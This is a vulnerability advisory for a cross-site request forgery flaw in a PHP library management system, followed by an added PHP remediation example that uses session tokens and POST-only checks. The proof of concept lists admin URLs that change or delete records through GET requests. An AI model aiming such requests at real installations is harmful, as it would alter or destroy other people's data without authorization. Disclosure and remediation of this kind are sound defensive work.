
Online Library Management System 2.0 Cross Site Request Forgery Vulnerability

Author: Mohit Dabas
Risk: Security Risk Low
0day-ID: 0day-ID-36423
Category: web applications
Date added: 15-06-2021
Platform: php

# Exploit Title: Online Library Management System
# Exploit Author : Mohit Dabas
# Vendor Homepage : https://phpgurukul.com
# Software Link : https://phpgurukul.com/online-library-management-system/
# Version: 2.0
# Tested on : LAMPP

# Description #

Online Library Management System has a CSRF vulnerability in the admin panel. The CSRF exists wherever the admin has an update or delete option.
The following are example URLs:

# Proof of Concept (PoC) : Exploit #

http://127.0.0.1:8080/library/admin/reg-students.php?id=12
http://127.0.0.1:8080/library/admin/edit-category.php?catid=4
http://127.0.0.1:8080/library/admin/manage-categories.php?del=4
http://127.0.0.1:8080/library/admin/update-issue-bookdeails.php?rid=6
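
One way to close this class of issue, shown as an added example that is not from the advisory or the vendor's code: state-changing admin actions are accepted only as POST requests that carry a per-session token. The function names `csrf_token` and `csrf_request_ok` and the form field name `csrf_token` are assumptions, and the request data in the self-check is constructed.

```php
<?php
// Added example: hypothetical hardened check, not the application's own code.
declare(strict_types=1);

// Issue one random token per session; embed it as a hidden field in every admin form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state change only as a POST carrying the session's token.
function csrf_request_ok(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // links such as ?del=4 must never change state
    }
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    // hash_equals() compares in constant time.
    return is_string($sent) && is_string($known) && $known !== ''
        && hash_equals($known, $sent);
}

// Self-check with constructed request data (run from the CLI).
$session = [];
$token   = csrf_token($session);

$cases = [
    'GET link, no token'  => ['GET',  []],
    'POST, missing token' => ['POST', ['del' => '4']],
    'POST, wrong token'   => ['POST', ['del' => '4', 'csrf_token' => str_repeat('0', 64)]],
    'POST, valid token'   => ['POST', ['del' => '4', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    $verdict = csrf_request_ok($method, $post, $session) ? 'accepted' : 'rejected';
    printf("%-20s %s\n", $label, $verdict);
}
```

In a real admin page the check would be called with `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION` after `session_start()`, before any update or delete query runs. Setting the session cookie's SameSite attribute (`session.cookie_samesite`, PHP 7.3+) adds a second layer.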
